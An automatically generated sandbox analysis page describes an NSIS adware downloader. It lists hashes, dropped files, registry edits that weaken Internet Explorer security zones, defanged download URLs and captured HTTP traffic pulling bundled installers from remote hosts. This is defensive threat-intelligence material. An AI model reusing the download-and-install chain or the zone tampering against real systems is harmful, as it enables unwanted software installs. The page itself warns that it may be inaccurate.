Trojan.NSIS.StartPage_5500256db8

by malwarelabrobot on November 4th, 2015 in Malware Descriptions.

not-a-virus:AdWare.Win32.AdLoad.dfqs (Kaspersky), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 5500256db87d044cb6803ab0ce21199e
SHA1: 7db29e55a1a4110317339616eb6388355faf0a8f
SHA256: b478d66e8b067df8ab7702e4b12cfbb767ebc5218e153cbc460f5db70fa77750
SSDeep: 6144:ye34m3aaXSL0fukseJ2 YTryxbCWyWyWM8AEWyWyWt:P4LQuqNYPy811DE11q
Size: 262156 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:468

The Trojan injects its code into the following process(es):

b_setup.exe:456
cpSetup.exe:1744

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:468 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nse2.tmp\conf (121 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\b_setup.exe (7800 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse2.tmp\NSISdl.dll (14 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nse2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso1.tmp (0 bytes)

The process b_setup.exe:456 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\cpSetup.exe (6937 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\NSISdl.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\591853039 (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd4.tmp (1568 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp (0 bytes)

The process cpSetup.exe:1744 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu7.tmp (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu8.tmp\1e5d0ed8-a824-4ba6-8ba3-12728026be4e.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00080f2b.a (74 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000814aa.a (1698 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsu8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu6.tmp (0 bytes)

Registry activity

The process %original file name%.exe:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 F3 F8 FD E6 7B C1 B5 D8 E5 13 9C A3 2F B2 3F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process b_setup.exe:456 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A FE 25 45 22 F6 9F 4D B7 46 85 09 9D D3 98 E0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process cpSetup.exe:1744 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "cpSetup.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1438735587"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 05 C2 6B BD C0 B8 20 DD 8C 13 07 51 37 AF DD"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

Dropped PE files

MD5 File path
d9e445ee82bfc6966903feac88cfa872 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\00080f2b.a
4198c1fa188ecfe67aa04118fc6f222d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\000814aa.a
96e8ee1d4bf35daff7e4fec3c99d43fd c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\b_setup.exe
7caaf58a526da33c24cbe122e7839693 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\NSISdl.dll
1495ac32cd7281fc47706df63e4b840a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\cpSetup.exe
89d40ecddf3ce6f3b0e6a84f40936912 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\nsArray.dll
a5f8399a743ab7f9c88c645c35b1ebb5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nse2.tmp\NSISdl.dll
de991d920463129f2d46ec7c4d282e9b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu8.tmp\1e5d0ed8-a824-4ba6-8ba3-12728026be4e.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 45056 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 237568 6056 6144 2.13941 1d66e3002c8233b935e22895bcb5ee34

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://fc-yies.website/launch_reb.php?p=sevenzip&pid=1505&tid=4076285&b_typ=pe&n=c3dfdW5pbnN0YWxsZXI= 46.21.100.248
hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker.php?program=sevenzip&tid=4076285&pid=1505&b_typ=pe&reb=1&name=sw_uninstaller&name=sw_uninstaller&t=first
hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=sevenzip&pid=1505&tid=4076285&b_typ=pe&n=c3dfdW5pbnN0YWxsZXI=&reb=1&ic=
hxxp://d24txo22v2kbr3.cloudfront.net/?affId=1006&appTitle=sw_uninstaller&s1=1505&s2=4076285&setupName=cpSetup&appVersion=2.92&instId=11
hxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=4076285&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.dibida-22.xyz/offer.php?affId={aff_id}&trackingId=2332413&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho 54.246.209.153
hxxp://up.dibida-22.xyz/offer.php?affId=1006&trackingId=2332413&instId=11&ho_trackingid=1028b4561ad9bf6688c33af9b8def1&cc=UA&cc_typ=ho 216.137.61.226
hxxp://up.dibida-22.xyz/installer.php?affId=1006&instId=11&ho_trackingid=1028b4561ad9bf6688c33af9b8def1&trackingId=2332413&cc=UA 216.137.61.226
hxxp://up.cp-int-45.xyz/installer.php?affId=1006&instId=11&ho_trackingid=1028b4561ad9bf6688c33af9b8def1&trackingId=2332413&cc=UA 54.88.21.193
hxxp://up.dibida-22.xyz/installer.php?affId=1006&instId=11&ho_trackingid=1028b4561ad9bf6688c33af9b8def1&trackingId=2332413&cc=UA&id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57&id[]=171&id[]=172&id[]=173&id[]=174&id[]=175&id[]=176&id[]=177 216.137.61.226
hxxp://up.int-ic-4.xyz/launch_v5.php?p=sevenzip&pid=1505&tid=4076285&b_typ=pe&n=c3dfdW5pbnN0YWxsZXI=&reb=1&ic= 216.137.61.225
hxxp://capital.go2cloud.orghxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=4076285&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.dibida-22.xyz/offer.php?affId={aff_id}&trackingId=2332413&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho 54.246.209.153
hxxp://up.dibida-22.xyzhxxp://up.dibida-22.xyz/installer.php?affId=1006&instId=11&ho_trackingid=1028b4561ad9bf6688c33af9b8def1&trackingId=2332413&cc=UA 216.137.61.226
hxxp://get.free-me-ic.xyz/?affId=1006&appTitle=sw_uninstaller&s1=1505&s2=4076285&setupName=cpSetup&appVersion=2.92&instId=11 216.137.61.24
hxxp://dl.up-cp-23.xyz/stub_maker.php?program=sevenzip&tid=4076285&pid=1505&b_typ=pe&reb=1&name=sw_uninstaller&name=sw_uninstaller&t=first 216.137.61.110
hxxp://up.dibida-22.xyzhxxp://up.dibida-22.xyz/offer.php?affId=1006&trackingId=2332413&instId=11&ho_trackingid=1028b4561ad9bf6688c33af9b8def1&cc=UA&cc_typ=ho 216.137.61.226
hxxp://up.dibida-22.xyzhxxp://up.dibida-22.xyz/installer.php?affId=1006&instId=11&ho_trackingid=1028b4561ad9bf6688c33af9b8def1&trackingId=2332413&cc=UA&id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57&id[]=171&id[]=172&id[]=173&id[]=174&id[]=175&id[]=176&id[]=177 216.137.61.226
hxxp://up.cp-int-45.xyzhxxp://up.cp-int-45.xyz/installer.php?affId=1006&instId=11&ho_trackingid=1028b4561ad9bf6688c33af9b8def1&trackingId=2332413&cc=UA 54.88.21.193


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake FireFox Version 2.

Traffic

GET /launch_reb.php?p=sevenzip&pid=1505&tid=4076285&b_typ=pe&n=c3dfdW5pbnN0YWxsZXI= HTTP/1.0
Host: fc-yies.website
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Date: Tue, 03 Nov 2015 07:17:02 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 121
Connection: close
Content-Type: text/html; charset=UTF-8
s=first..u=hXXp://dl.up-cp-23.xyz/stub_maker.php?program=sevenzip&tid=
4076285&pid=1505&b_typ=pe&reb=1&name=sw_uninstaller..



GET hXXp://up.dibida-22.xyz/installer.php?affId=1006&instId=11&ho_trackingid=1028b4561ad9bf6688c33af9b8def1&trackingId=2332413&cc=UA&id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57&id[]=171&id[]=172&id[]=173&id[]=174&id[]=175&id[]=176&id[]=177 HTTP/1.1
Host: up.dibida-22.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3


HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 417832
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Tue, 03 Nov 2015 07:17:16 GMT
X-Cache: Miss from cloudfront
Via: 1.1 974c28f7c099ed222b7c7aa8bcbaf5da.cloudfront.net (CloudFront)
X-Amz-Cf-Id: PqyEqu2PMNugf3x16KltW882SdYsmuKYPWLljgEH2swbGiSpYSuWCA==
.....l...h...p..;[email protected]}...d...t.@~...[..........`df..J...T..0.o.. ..
`..:.9.J[../....w.....s..iZ....&/......:.8#q>.p .)w !0p...0I.b.?.Tf
.....=...{.~].. .u$j...Kr..F...P.-..o.x.P..aL..b`!z... ;....V.7LN.<
.i..........|....Z...b*....n.=..v...8..0.....@E?P...B..v0...Z?.....3q.
.^. K.u.>.D8.-...X......."..,.......?..=8...o(.'@mn.....4!X.g....Cv
.p.-.......CC..6k.1X/_HM.......Y?...((.W3Xk._.H.P.~^J..u.k5.t..>..$
F......Z.F^.q{.R2..jj.f&...e._k...w......_...6.tf.o.....{..J.......Qx.
!y....3..>..5.v.g.v..9v.3...........>?q!..^.*......sA.|@......!.
.{[email protected]'$....Y...H.'X....;5..t#.....<Z{F.<.z....
.Z..o..S[\...s......q[A.p&.&...Xxo.K.|O...ZU........S.......G7.i....Bx
.M>M.$..:.p.!.3.....-}.Dh.P'...L....F.Y._`>....Qm?...W.~}..Q.v.W
Ncw.*B.(T..`\..lO..a.P....sH...3..EM.D..6.I..O........x.{a...}27.[.M..
..:E..!...6........g.~.No].....'.[..MS..."..{.:.[..AcV.~.cn4'.......W.
Z....k.ydF.O..Oe..-X.....qFq..~.Hfg..M.~..P...-......r<....*.....N.
.........ro.H.......1......Yo....t....l....&K....1....<..I1Z.F..j.h
<_.Rc....q..~.[.I.a..-.;.. ..6T1.H.=..Y...?..s.'O...{.h.t..64Cx.r..
....S..Y....~...X:~.......XX.E.....6.i~.~@.(u3.0.T.:M.5......`...?..F.
...T...Z...R..R.j.U...*\[email protected]( D.7)c..@&R..p_.).^
N.^..rNO..K..w.[r......mE..R..........{...I.....n.*.A..p.......u..<
..$..N..2.<g.:...~..S....w.."4H.....>.UA.b..........].0.@.....?B
$..{.g...?pG.5p.h....>;u..<...... %..XJ[.3......\....p....9C...d
...s%. z.)..y......i].sk..#..N...}.........I...1..!c.WUO.]\....#M{
<<< skipped >>>


GET /launch_v5.php?p=sevenzip&pid=1505&tid=4076285&b_typ=pe&n=c3dfdW5pbnN0YWxsZXI=&reb=1&ic= HTTP/1.0
Host: up.int-ic-4.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 1590
Connection: close
Date: Tue, 03 Nov 2015 07:17:05 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 22d1c3da7034c9d974fcbde908eb6a50.cloudfront.net (CloudFront)
X-Amz-Cf-Id: m5SZwd7Jx40TJpKni725UKRs1wjkM7Egxf9ZQLH2v-0T6EGlYTiDbw==
files=4.t1=dl.u1=hXXp://get.free-me-ic.xyz/?affId=1006&appTitle=sw_uni
nstaller&s1=1505&s2=4076285&setupName=cpSetup&appVersion=2.92&instId=1
1.n1=cpSetup.exe.b1=cp.c1=sevenzip-1.s1=0.m1=0.d1=0.t2=dl.u2=hXXp://ge
t.file184desktop.info/DownloadManager/Get?p=638&d=544&l=461&n=1&produc
tname=sevenzip&d1=4076285&d2=1505&dynamicname=sw_uninstaller.n2=setup-
1228.exe.b2=ru.c2=sevenzip-2.s2=0.m2=1.d2=1500.t3=dl.u3=hXXp://VVV.amo
nisto.org/download.php?version=1.1.5.26&campid=2140&instid[appname]=&i
nstid[appsetupurl]=http://pe-sixi.com/downloadS.php?bu=am&
instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/im
g/icon_installer.png&prefix=Setup&instid[thankyoupage]=.n3=Setup__21
40_il150.exe.b3=am.c3=2140-sevenzip.s3=0.m3=0.d3=0.t4=dl.u4=hXXp://sta
pi.sweetcomet.com/api/stamp/setup.exe?&affiliateid=1780&productname=sw
_uninstaller&producturl=http://d3pccup19xda2t.cloudfront.net/s
evenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfro
nt.net/pe/szip_pub.png&productversion=9.20&producteula=http:/%
2Fsevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publis
hercontact=http://sevenzip.info&productbusiness=sd,se,ad,c
o,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1505&subid2=4
076285.n4=SevenZip-apset.exe.b4=ap.c4=sevenzip.s4=0.m4=0.d4=0.t5=dl.u5
=hXXp://sub.spirlymo.com/installers/cli/1446534132188/SevenZip_downloa
der-Qb8uuvhdf.exe.n5=SevenZip_downloader-Qb8uuvhdf.exe.b5=bi.c5=sevenz
ip-3.s5=0.m5=1.d5=1500.fn1=Components.fn2=File opener.fn3=File fin
<<< skipped >>>


GET hXXp://up.dibida-22.xyz/offer.php?affId=1006&trackingId=2332413&instId=11&ho_trackingid=1028b4561ad9bf6688c33af9b8def1&cc=UA&cc_typ=ho HTTP/1.1
Host: up.dibida-22.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3


HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 74792
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Tue, 03 Nov 2015 07:17:16 GMT
X-Cache: Miss from cloudfront
Via: 1.1 e24fef4a7b03bd84e1e8d57f2471a84d.cloudfront.net (CloudFront)
X-Amz-Cf-Id: MRFx8oKyO31MTMzDHVaYNtr59XDeFcgVewXqba4BlcSeACv3zjk7kQ==
D].........[7..."M.8.Yx.Tk....5k..X.m(.(..".....S...S.....BUWQE......d
.'..7{.v....:Z4...t....P....N...U.......q....3k...;*Q..>}..].... .3
>..q........L.../..E)J...:..=.8.Z..C.O.. ,......(..^....x..v..3.R8.
../. ..2A.^....i....Yp..t...L....K.Gb...m...|.|.l.|~Q.!.p..t..B7..`..Y
P...qV....g..0... .yUi.#~.r ..(.....z....................H.`.|.....bH;
7e../.z....`e.w.t.V. ..[...... .TMb...5lW.....).<t.Wl*...?...... ..
.....TN....Q....H.i_.&.'...!..=..)...s..1k.?...l.O...m.2`...7..{.J..0h
s....r-.......n.....1.......(..9.:b........F.....-........o........T.N
.XJ..oC".n...\.`..FEn.]b.A.....5G...Jef.?0..R0.....b..G..r4. .........
\G..,..q.s......~b!.^..i......XI.....[.1._.0.-.~.r.].6..%(.}x..e.o2Vnl
75...0o.bmu.....s..4p?..O.f......l7.!...1Wy...l..I:.H4...E...b....EL.T
!.............&..Sc...N...w..........N....1bR\......_..B...F.{........
..F..'.=H..B..?..R.}...}..O.$f;.^".y..p?.?.H U..~C...5...-...Q...J '.]
...9I..Fc...G..Y.< .8.....es\.QT.C=d...oN....P,.Fi ....-o.i`.s.Q.d.
.,...x e4vg..G..qN...F.!(.... ........T.ws. ........ZH..4....*\..s7.,.
.....!W'...Z.....u.YLI.m....pD..sR.0......p.Mh. ._...;f.h..d........&g
t;!....3......0...Cd.|[vN.....4's.....4m..p&..5mp*...|.S.:.......).k..
.y..{..]....L.pk.....k?O.EB..*Mj..wiV.......`.}.......:/....?.#=l.y...
2........~VH....'..J.T...P....t.6.*...|...X..!C.).&.......E.._.`.kJ[3.
!u ....a..cMJ.k:[email protected]==-.n/=.....[h6..:...n.%.`.....3.-...i
 )|.....vo.;.i.....@....#.=.. >I..........Z....A.|@..]....@/..q6_..
..D.,]*@.2F.j.D..F.*G......0.V1..q8.......>fCYV-'Mah..C..&....`
<<< skipped >>>


GET hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=4076285&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.dibida-22.xyz/offer.php?affId={aff_id}&trackingId=2332413&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho HTTP/1.1
Host: capital.go2cloud.org
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3


HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 03 Nov 2015 07:17:09 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://up.dibida-22.xyz/offer.php?affId=1006&trackingId=2332413&instId=11&ho_trackingid=1028b4561ad9bf6688c33af9b8def1&cc=UA&cc_typ=ho
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.7.9
Set-Cookie: enc_aff_session_4=ENC02664-1028b4561ad9bf6688c33af9b8def1-1006-4-0-0-0-0-UA-2-3131-31353035-34303736323835-30-30-30-194.242.96.218-20151103021709-_-75770D34661C04016E3A685F097468746D4E0302054E23435C4C4A11373D683211373A4D276218635C; expires=Thu, 03 Dec 2015 07:17:09 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfZGV2aWNlX29zIjoiRGVza3RvcCIsIm1vYmlsZV9kZXZpY2VfbW9kZWwiOiJGaXJlZm94IiwibW9iaWxlX2RldmljZV9icmFuZCI6Ik1vemlsbGEiLCJtb2JpbGVfYnJvd3NlciI6IkZpcmVmb3ggRGVza3RvcCIsIm1vYmlsZV9icm93c2VyX3ZlcnNpb24iOiIyLjAiLCJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBGcjsgUnY6MS44LjEuMykgR2Vja28vMjAwNzAzMDkgRmlyZWZveC8yLjAuMC4zIiwiY29ubmVjdGlvbl9zcGVlZCI6ImJyb2FkYmFuZCJ9; expires=Thu, 27 Sep 2018 17:57:09 GMT; path=/;
tracking_id: 1028b4561ad9bf6688c33af9b8def1
X-Robots-Tag: noindex, nofollow
Content-Length: 338
Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a 
href="hXXp://up.dibida-22.xyz/offer.php?affId=1006&trackingId=2332
413&instId=11&ho_trackingid=1028b4561ad9bf6688c33af9b8def1&
;cc=UA&cc_typ=ho">here</a>.</p>.</body></h
tml>...
<<< skipped >>>


POST hXXp://up.cp-int-45.xyz/installer.php?affId=1006&instId=11&ho_trackingid=1028b4561ad9bf6688c33af9b8def1&trackingId=2332413&cc=UA HTTP/1.1
Host: up.cp-int-45.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Content-Type: application/x-www-form-urlencoded

id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57&id[]=171&id[]=172&id[]=173&id[]=174&id[]=175&id[]=176&id[]=177
HTTP/1.1 411 Length Required
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Tue, 03 Nov 2015 07:17:16 GMT
Connection: close
Content-Length: 344
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""hXXp://VVV.w3.org
/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>Length
 Required</TITLE>..<META HTTP-EQUIV="Content-Type" Content="t
ext/html; charset=us-ascii"></HEAD>..<BODY><h2>Le
ngth Required</h2>..<hr><p>HTTP Error 411. The reque
st must be chunked or have a content length.</p>..</BODY>&
lt;/HTML>....



POST hXXp://up.dibida-22.xyz/installer.php?affId=1006&instId=11&ho_trackingid=1028b4561ad9bf6688c33af9b8def1&trackingId=2332413&cc=UA HTTP/1.1
Host: up.dibida-22.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Content-Type: application/x-www-form-urlencoded

id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57&id[]=171&id[]=172&id[]=173&id[]=174&id[]=175&id[]=176&id[]=177
HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Tue, 03 Nov 2015 07:17:11 GMT
Content-Type: text/html
Content-Length: 689
Connection: close
X-Cache: Error from cloudfront
Via: 1.1 ecc0c6e7bd06eacf696003aa79e1e25a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Kw63CdGMeEJaja0ts4373pZspdc5wtui8c5h3ljjo8no_d-md0Y3dQ==
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "htt
